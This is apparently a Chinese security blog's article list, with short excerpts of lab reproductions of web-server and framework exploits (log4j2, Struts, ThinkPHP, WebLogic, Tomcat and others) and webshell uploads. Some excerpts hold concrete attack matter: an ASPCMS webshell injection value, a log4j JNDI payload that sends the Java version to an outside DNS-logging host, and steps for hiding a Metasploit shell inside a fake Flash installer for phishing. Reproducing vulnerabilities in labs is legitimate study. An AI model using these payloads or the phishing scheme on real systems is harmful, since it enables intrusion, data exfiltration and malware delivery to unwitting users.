- 博客(34)
- 收藏
- 关注
原创 IIS RCE-CVE-2017-7269
Microsoft windows Server 2003 R2中的 Interne信息服务IIS6.0中的 WebDAV服务中的 ScStoragePathFromUrl函数中的缓冲区溢出允许远程攻击者通过以 If。
2024-08-07 20:58:56
291
原创 spring 代码执⾏ (CVE-2018-1273)漏洞
Spring Data 是⼀个⽤于简化数据库访问,并⽀持云服务的开源框架,Spring Data Commons 是 Spring Data 下所有⼦项⽬共享的基础框架。Spring Data Commons 在 2.0.5 及 以前版本中,存在⼀处 SpEL 表达式注⼊漏洞,攻击者可以注⼊恶意 SpEL 表达式以执⾏任意命令。
2024-08-07 19:37:25
564
原创 Shiro rememberMe反序列化漏洞(Shiro-550)
Apache Shiro是⼀个强⼤易⽤的Java安全框架,提供了认证、授权、加密和会话管理等功 能。Shiro框架直观、易⽤,同时也能提供健壮的安全性。
2024-08-07 19:26:08
337
原创 Spring Data Rest 远程命令执⾏命令(CVE-2017-8046)
Spring是Java EE编程领域的⼀个轻量级开源框架,该框架由⼀个叫Rod Johnson的程序员 在2002年最早提出并随后创建,是为了解决企业级编程开发中的复杂性,业务逻辑层和其他各 层的松耦合问题,因此它将⾯向接⼝的编程思想贯穿整个系统应⽤,实现敏捷开发的应⽤型框 架。框架的主要优势之⼀就是其分层架构,分层架构允许使⽤者选择使⽤哪⼀个组件,同时为 J2EE应⽤程序开发提供集成的框架。
2024-08-07 19:08:48
559
原创 struts S2-057远程执⾏代码漏洞
漏洞产⽣于⽹站配置XML时如果没有设置namespace的值,并且上层动作配置中并没有设置 或使⽤通配符namespace时,可能会导致远程代码执⾏漏洞的发⽣。同样也可能因为url标签没 有设置value和action的值,并且上层动作并没有设置或使⽤通配符namespace,从⽽导致远程 代码执⾏漏洞的发⽣。
2024-08-07 18:41:27
1104
原创 Thinkphp5x远程执行命令及getshell
靶场:vulhub/thinkphp/5-rcedocker-compose up -d #启动环境。
2024-08-07 18:27:39
797
原创 Weblogic 漏洞(详细)
访问一下默认用户名:weblogic 密码: Oracle@123然后点击安装然后再点击上传文件将jsp木马打包,改为war上传一直下一步,最后点完成 然后使用工具连接。
2024-08-06 20:07:18
456
原创 Tomcat 漏洞
1.使用burp抓包 把get改成putjsp文件后加/添加完成后访问 木马然后木马的网址 在哥斯拉测试并且添加添加成功 然后我们就成功进去啦、
2024-08-06 18:04:53
1004
原创 vulhub靶场之wordpress关卡(保姆级教程)
1.选择简体中文 然后添加信息 点击安装wordpress1.2 登陆后台1.3 在后台修改模板1.4 找一个php文件,在最开头加入一句话木马点击更新 然后访问默认模板路径 下面的是默认的模板路径然后复制网址 使用工具连接。
2024-08-04 01:02:46
260
原创 phpMyAdmin 漏洞复现教程
然后我们更改日志保存路径然后查看是否更改成功 显示 更改成功然后我们插入一句话木马访问一下木马然后使用工具连接。
2024-08-03 21:46:55
622
原创 ASPCMS 漏洞详细教程
将slideTextStatus的值修改为1%25><%25Eval(Request(chr(65)))25><%25 放包(连接密码是a)然后用工具连接 成功连接。
2024-08-03 21:11:12
414
原创 业务逻辑支付漏洞靶场复现dami niu cmseasy(保姆教程)
在CmsEasy7.6.3.2版本中,存在订单金额任意修改逻辑漏洞,攻击者利用业务逻辑层的应用安全问题,在提交订单时抓取数据包并修改,以及对订单的数量进行任意修改(打到资本家!此漏洞可能造成企业的资产损失和名誉受损,传统的安全防御设备和措施收效甚微,危害还是比较大的捏。
2024-08-02 17:17:59
751
2
原创 log4j2远程执行代码CVE-2021-44228复现
可以看到有三个服务,看到熟悉的rmi和ldap ,实际上这个jar的作用就是帮我们生成了恶意代码类,并且生成了对应的url,然后我们就可以回到刚才的网站去进行JNDI注入 另外开启监听。上传参数 solr/admin/cores?action=${jndi:ldap://${sys:java.version}.jxmxiy.dnslog.cn 获得java版本号。发现 /solr/admin/cores?action=参数 可以上传 如下图。下载JDNI,放到攻击机,输入如下命令。开始准备反弹shell。
2024-07-31 20:01:38
299
原创 申瓯通信设备有限公司在线录音管理系统(复现过程)
申瓯通信设备有限公司在线录音管理系统 index.php接口处存在任意文件读取漏洞,恶意攻击者可能利用该漏洞读取服务器上的敏感文件,例如客户记录、财务数据或源代码,导致数据泄露。
2024-07-31 19:11:13
551
原创 upload-labs-靶场(1-19关详细解答 保姆级教程)
下载 upload-labs-mster靶场 创建一个upload目录 不然无法打开upload-labs 靶场1.我们先上传一个 php后缀文件 显示我们该文件不允许上传 只能上传 jpg png gif的文件后缀2.我们可以上传 自己写的php 后缀改成jpg上传 然后抓包 可以看到 数据上传了 我们可以在burpsuite里修改一下后缀 改成php后缀 这样我们自己写的php就上传成功了我们发现 我们的php文件上传成功了然后在上传到的图片鼠标右键新建标签页打开图片 就上传成功了。
2024-07-26 17:31:09
1353
原创 xss--flash钓鱼
四 新建一个1.js文件 然后在xss平台找到flash弹窗钓鱼 然后查看他的源代码 复制到新建的1.js里面。五.然后在kali里使用msf命令生成shell木马 如下图。当我们安装 上面解压好的那个flash的时候 这里就会显示。三.下载完成把网站部署在phpstudy www根目录下。七.把flash 安装包跟shell.exe一起压缩。六.把shell拖到自己主机桌面 或者根目录下。一.本机下载小皮面板 开启环境。然后在1.js里修改成伪造网站的ip。二.下载flash源文件。
2024-07-23 19:26:23
416
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人